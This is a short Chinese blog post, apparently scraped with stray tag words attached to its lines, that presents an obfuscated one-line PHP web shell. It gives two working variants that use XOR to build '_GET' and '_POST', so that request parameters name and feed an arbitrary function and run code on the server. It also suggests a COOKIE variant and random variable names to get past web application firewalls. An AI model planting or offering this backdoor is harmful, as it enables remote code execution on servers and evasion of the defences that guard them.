今天看到以下圖所示的PHP一句話,以爲挺有意思。php
代碼以下:spa
<?=~$_='$<>/'^'{{{{';echo $_;@${$_}[_](@${$_}[__]);?>
效果圖:.net
看下圖註釋應該就能夠一目瞭然了,就是根據異或運算獲得$_=’_GET’。code
若是想換成POST方法,則可變化以下。blog
<?=~$_='$+4(/'^'{{{{{';@${$_}[_](@${$_}[__]);?>
效果圖:ci
換成COOKIE方法,則可變化以下,用於bypass waf更有用吧。這只是一種思路,這個句子還能夠有不少種變形,好比隨機變量名。it
引用:class
https://www.php.net/manual/zh/language.operators.bitwise.php變量
http://asciima.com/引用
轉載請註明出處。